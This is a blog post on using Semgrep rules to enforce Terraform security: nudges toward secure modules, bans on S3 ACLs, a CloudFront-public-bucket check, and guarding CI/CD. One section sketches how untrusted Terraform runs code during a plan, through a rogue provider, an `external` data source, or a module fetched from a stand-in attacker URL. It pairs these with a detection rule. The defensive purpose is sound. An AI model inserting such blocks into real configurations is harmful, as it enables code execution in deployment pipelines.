Semgrep for Terraform Security

Apr 29, 24

I’m a bit of a Semgrep fanboy

I remember first trying it out in my consultant days. It was such a relief to find a SAST tool that was fast, didn’t require building the code, was extensible, and came with a solid set of default rules. It quickly replaced language-specific SAST tools like bandit and nodejsscan, as it subsumed their rule sets.

I’m also an Infrastructure as Code fanboy

I started using Terraform seriously in 2019, around version 0.12. My first open source project, sadcloud, used Terraform to stand up (and tear down) insecure infrastructure. Having everything managed as code has made infrastructure security more practical, especially in a startup environment.

Semgrep is good for Terraform Security

Secure-by-default modules

One approach to killing bug classes in Terraform is to replace the overly flexible default modules with custom, secure-by-default ones.

Example 1: secure-bucket

S3 bucket leaks are the most common major AWS security incident. They’re so common, I’ve given up tracking them in my repository of aws-customer-security-incidents! In addition to making the bucket private (which is now the default 😌), there are security optimizations around Encryption, Versioning, Block Public Access, and Logging.

It’s common for companies to have a wrapper module for all this configuration, to make it easy for engineers to get a bucket deployed without dozens of lines of non-DRY configuration.
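As a rough sketch of what such a wrapper might contain, the four controls above map onto a handful of AWS provider resources. The file layout, the variable names, and the choice of KMS encryption are my assumptions for illustration, not a published module:

```hcl
# modules/secure-bucket/main.tf (hypothetical layout and variable names)
variable "name" {
  type = string
}

variable "log_bucket" {
  type = string
}

resource "aws_s3_bucket" "this" {
  bucket = var.name
}

# Block Public Access: all four switches on.
resource "aws_s3_bucket_public_access_block" "this" {
  bucket                  = aws_s3_bucket.this.id
  block_public_acls       = true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}

# Versioning.
resource "aws_s3_bucket_versioning" "this" {
  bucket = aws_s3_bucket.this.id
  versioning_configuration {
    status = "Enabled"
  }
}

# Encryption at rest (KMS is an assumed choice here).
resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  bucket = aws_s3_bucket.this.id
  rule {
    apply_server_side_encryption_by_default {
      sse_algorithm = "aws:kms"
    }
  }
}

# Access logging to a central log bucket.
resource "aws_s3_bucket_logging" "this" {
  bucket        = aws_s3_bucket.this.id
  target_bucket = var.log_bucket
  target_prefix = "${var.name}/"
}
```

One wrinkle: the module itself has to declare a raw aws_s3_bucket, so any Semgrep rule that flags raw buckets needs to skip the module's own directory (for example with a paths exclude on the rule).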

Example 2: safe-proxy-access

Most companies build up a set of internal applications. Attackers have a history of using these as a foothold. A good first step is to keep them off the public internet, often by putting them behind an identity-aware proxy. This can take a fair bit of configuration (ALB, Cognito, Okta, etc.). By bundling this as a single module, it can be offered as a pluggable service.
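From the consumer's side, the goal is something like the following. This is a hypothetical interface: the module path and every input name are invented for illustration, and the real inputs would depend on your proxy stack.

```hcl
# Hypothetical usage of an internal "safe-proxy-access" module.
# The source path and all input names below are illustrative assumptions.
variable "admin_dashboard_target_group_arn" {
  type = string
}

module "admin_dashboard_access" {
  source = "../modules/safe-proxy-access"

  app_name         = "admin-dashboard"
  hostname         = "admin.internal.example.com"
  target_group_arn = var.admin_dashboard_target_group_arn
  allowed_groups   = ["engineering", "support"]
}
```

The point is that the engineer supplies a name and a target, and the listener, identity provider wiring, and DNS all come along for free.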

Use Semgrep to evangelize secure-by-default modules

Okay, so you have a whole set of great modules, but you’ll still hit a roadblock: discovery!

How is that new employee going to know to use secure-bucket? I mean, yes, it’s on page 13 of onboarding, but that was post-lunch and they were a little sleepy.

Semgrep is great here! You just write a simple rule:

rules:
  - id: raw-s3-resource
    pattern: |
      resource "aws_s3_bucket" "$X" {
        ...
      }
    languages:
      - hcl
    severity: WARNING
    message: |
      Hi! It looks like you're using a raw S3 resource.
      We recommend you instead use `secure-bucket`.
      Visit go/secure-bucket for details!

Then, you add that rule to your CI/CD checks, and developers will get a message on their PRs. This is a soft nudge that leaves room for deviation, while prodding people to the paved road!
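To check that the rule fires where you expect, Semgrep's rule tests let you annotate a target file with expected results. A minimal sketch, assuming the rule is saved as raw-s3-resource.yaml next to a raw-s3-resource.tf fixture (both file names and the module path are placeholders):

```hcl
# raw-s3-resource.tf (hypothetical test fixture)
# "ruleid:" marks a line where a finding is expected; "ok:" marks one where
# no finding is expected.

# ruleid: raw-s3-resource
resource "aws_s3_bucket" "uploads" {
  bucket = "example-uploads"
}

# ok: raw-s3-resource
module "uploads" {
  source = "../modules/secure-bucket" # placeholder path
  name   = "example-uploads"
}
```

Running Semgrep in its `--test` mode against the directory holding both files should then report whether the annotations hold.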

Semgrep for opinionated rules

In addition to “nudges,” you can implement hard guardrails and invariants using Block mode.

You can also use this with Terraform when you want to force explicit choices instead of relying on implicit defaults. This can be helpful in highlighting critical configuration elements. For example, you might want all Load Balancers to be explicitly “internal” or “external”:

rules:
  - id: lb-explicit-internal-external
    patterns:
      - pattern: |
          resource "aws_lb" "$Z" {
            ...
          }
      - pattern-not: |
          resource "aws_lb" "$X" {
            ...
            internal = $Y
            ...
          }
    languages:
      - hcl
    severity: ERROR
    message: You must explicitly set the `internal` argument to true or false.
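
For illustration, here is a pair of resources showing what that rule is meant to separate. The names and the subnet variable are placeholders:

```hcl
variable "subnet_ids" {
  type = list(string)
}

# Flagged: `internal` is omitted, so the provider default (false, meaning
# internet-facing) applies silently.
resource "aws_lb" "implicit" {
  name               = "implicit-lb"
  load_balancer_type = "application"
  subnets            = var.subnet_ids
}

# Passes: the author had to make the call.
resource "aws_lb" "backoffice" {
  name               = "backoffice-lb"
  internal           = true
  load_balancer_type = "application"
  subnets            = var.subnet_ids
}
```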

Or, if you want to ban S3 ACLs (given they’re messy, and deprecated, and gross), just do:

rules:
  - id: s3-acls
    pattern-either:
      - pattern: |
          resource "aws_s3_bucket_acl" "$Z" {
            ...
          }
      - pattern: |
          resource "aws_s3_bucket" "$X" {
            ...
            acl = "$Y"
            ...
          }
    languages:
      - hcl
    severity: ERROR
    message: S3 ACLs are deprecated and may not be used. See go/s3-acls
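
A sketch of what this rule is meant to catch, alongside one ACL-free alternative. Bucket names are placeholders, and using ownership controls as the replacement is my suggestion rather than something the rule enforces:

```hcl
# Flagged: inline ACL argument on the bucket.
resource "aws_s3_bucket" "legacy_inline" {
  bucket = "example-legacy-inline"
  acl    = "public-read"
}

resource "aws_s3_bucket" "legacy_standalone" {
  bucket = "example-legacy-standalone"
}

# Flagged: standalone ACL resource.
resource "aws_s3_bucket_acl" "legacy_standalone" {
  bucket = aws_s3_bucket.legacy_standalone.id
  acl    = "private"
}

# Not flagged: no ACL anywhere, and ownership controls disable ACLs outright.
resource "aws_s3_bucket" "modern" {
  bucket = "example-modern"
}

resource "aws_s3_bucket_ownership_controls" "modern" {
  bucket = aws_s3_bucket.modern.id
  rule {
    object_ownership = "BucketOwnerEnforced"
  }
}
```

One thing worth testing in your own setup: the inline pattern matches a quoted string (`acl = "$Y"`), so an ACL passed in as a variable reference may slip past it.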

Use Semgrep to secure your CI/CD

At a certain scale, you need to start applying your Terraform centrally, through an automated CI/CD system. Atlantis is the most popular open source offering. I’ve also used and enjoyed Spacelift, and of course there is always Terraform Cloud.

Applying TF via CI/CD improves security: developers no longer need privileged access locally, you can enforce code review, and you can run those CI/CD configuration scans!

But there is a major risk: running a terraform plan on untrusted code can lead to remote code execution.

Some ways an attacker can execute code if they can run a plan:

Import a malicious provider, which runs the payload on init
Use the external data source to run code directly
Or, you can do either indirectly by loading an external module
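
To make those concrete, here is roughly what each vector looks like in a pull request. The payload is a harmless placeholder, and the provider and module sources are made-up names:

```hcl
# 1. A provider from an untrusted namespace. Terraform downloads it during
#    init and executes its binary when planning.
terraform {
  required_providers {
    helper = {
      source = "attacker-namespace/helper" # hypothetical
    }
  }
}

# 2. The external data source runs an arbitrary program whenever the data
#    source is read, which includes `terraform plan`.
data "external" "payload" {
  program = ["sh", "-c", "echo '{}'"] # benign stand-in for a real payload
}

# 3. A module fetched from outside the repository, which can contain
#    either of the above.
module "innocuous" {
  source = "git::https://example.com/attacker/module.git" # hypothetical
}
```

Only the second of these is a distinctive block in the repository itself; the other two hide behind a source string, which is part of why pattern-based detection here is brittle.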

So, before running any Terraform commands, you can first use Semgrep to attempt (brittle!) detection of these patterns. On any match, you could alert the security team, notify the user, or take whatever steps are appropriate in your organization.

rules:
  - id: ban-external-provider
    pattern: |
        data "external" "$Z" {
          ...
        }
    languages:
      - hcl
    severity: ERROR
    message: The external provider is not allowed, as it can be used to execute code during TF plans

Of course, the same is possible (and maybe better) using OPA and conftest, but there are benefits to using Semgrep here:

the syntax is homogeneous with your other SAST
you can leverage the same integrations
you can run the exact same rules at PR time and pre-Plan to provide an improved developer experience

Write custom rules, catch subtle bugs

Shoehorning this in, because I love it. A lot of the current registry rules, as with any security tool, are mostly about “CIS Benchmark” misconfigurations - think: encryption or logging disabled. But SAST really delivers a flywheel of value when you take real findings and turn them into scalable rules.

Here’s one example of a confusing footgun I’ve seen go off:

It’s common to put CloudFront in front of S3
By setting up either origin access identity (OAI) or origin access control (OAC), you can limit access to the bucket to only come from CloudFront
If you do this with a private bucket, all the objects are now publicly accessible via CloudFront unless you configure a signer, which then limits access to signed URLs
This is well marked (“Restrict viewer access”) in the UI. But in Terraform, it’s easy to miss that this “toxic combination” of settings makes a bucket public.

So, we can write a Semgrep rule that checks for any aws_cloudfront_distribution that is fronting S3 (has s3_origin_config or origin_access_control_id) but isn’t set up to require signing (has neither trusted_signers nor trusted_key_groups). Here’s a messy first pass:

rules:
  - id: public-s3-via-cloudfront
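    patterns:
      - pattern-either:
        - pattern: |
            resource "aws_cloudfront_distribution" "$Z" {
              ...
              origin {
                ...
                s3_origin_config {
                  ...
                }
                ...
              }
              ...
            }
        - pattern: |
            resource "aws_cloudfront_distribution" "$Z" {
              ...
              origin {
                ...
                origin_access_control_id = $W
                ...
              }
              ...
            }
      # trusted_signers and trusted_key_groups are set inside cache behavior
      # blocks; this first pass only inspects default_cache_behavior.
      - pattern-not: |
          resource "aws_cloudfront_distribution" "$X" {
            ...
            default_cache_behavior {
              ...
              trusted_signers = $Y
              ...
            }
            ...
          }
      - pattern-not: |
          resource "aws_cloudfront_distribution" "$X" {
            ...
            default_cache_behavior {
              ...
              trusted_key_groups = $Y
              ...
            }
            ...
          }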
    languages:
      - hcl
    severity: WARNING
    message: |
     This will make the S3 bucket accessible publicly via CloudFront.
     Please either set up a signer or confirm all objects are public.
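
For reference, here is a sketch of a distribution this rule is meant to catch. All the variables are placeholders for values that would come from elsewhere in your configuration:

```hcl
variable "bucket_regional_domain_name" {
  type = string
}

variable "origin_access_control_id" {
  type = string
}

variable "cache_policy_id" {
  type = string
}

variable "key_group_id" {
  type = string
}

resource "aws_cloudfront_distribution" "assets" {
  # OAC locks the bucket down to CloudFront, but says nothing about who may
  # talk to CloudFront.
  origin {
    domain_name              = var.bucket_regional_domain_name
    origin_id                = "assets-s3"
    origin_access_control_id = var.origin_access_control_id
  }

  enabled = true

  default_cache_behavior {
    target_origin_id       = "assets-s3"
    viewer_protocol_policy = "redirect-to-https"
    allowed_methods        = ["GET", "HEAD"]
    cached_methods         = ["GET", "HEAD"]
    cache_policy_id        = var.cache_policy_id

    # Without a signer here, anyone can fetch every object in the bucket
    # through the distribution. Uncommenting the next line restricts access
    # to signed URLs or cookies:
    # trusted_key_groups = [var.key_group_id]
  }

  restrictions {
    geo_restriction {
      restriction_type = "none"
      locations        = []
    }
  }

  viewer_certificate {
    cloudfront_default_certificate = true
  }
}
```

Note where the signer setting lives: in the AWS provider it is an argument of the cache behavior blocks, not of the distribution itself, which is one more reason it is easy to overlook in review.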

This is a case where there may be an intentional business reason for the configuration, but the misconfiguration is subtle enough and high-risk enough to warrant explicit inline guidance to developers. If you’re using a secure-bucket pattern consistently, you could refine this rule further to detect references to a bucket created with the private bucket module.

Semgrep for Terraform Security

Alternatives for Terraform Security definitely exist. OPA and conftest were mentioned above, and checkov is also a frequent recommendation. Semgrep is easy to get started with, but check out these references and research for a broader survey on SAST for Terraform!

References

GitLab - Fantastic Infrastructure as Code security attacks and how to find them
Marco Lancini - Semgrep for Cloud Security
Christophe Tafani-Dereeper - Shifting Cloud Security Left — Scanning Infrastructure as Code for Security Issues
Albert Heinle - The Current State of Infrastructure as Code (IaC) from a Security Standpoint
Frans van Buul - Everything-as-Code: Pushing the boundaries of SAST
Serhii Vasylenko - A Deep Dive Into Terraform Static Code Analysis Tools: Features and Comparisons

Research on SAST for Infrastructure as Code

Jan 2022: A Large-Scale Study on the Security Vulnerabilities of Cloud Deployments

Ran tfsec, terrascan and checkov against 8256 public repositories containing AWS TF, resulting in 292538 security violations
The most common issues found are Encryption, Access control, and Insecure defaults

Aug 2023: Exploring Security Practices in Infrastructure as Code: An Empirical Study

Ran checkov against 800 recently active projects that contain some Terraform code
“Our findings indicate that IaC configuration poses a major risk and confirm that, despite the availability of security scanning tools, there is a lack of adoption of best practices in open-source projects”

Nov 2023: Security Vulnerabilities in Infrastructure as Code: What, How Many, and Who?

Ran Snyk and Horusec against the source code of 7 IaC tools and that of over 1,600 Infrastructure as Code scripts and add-ons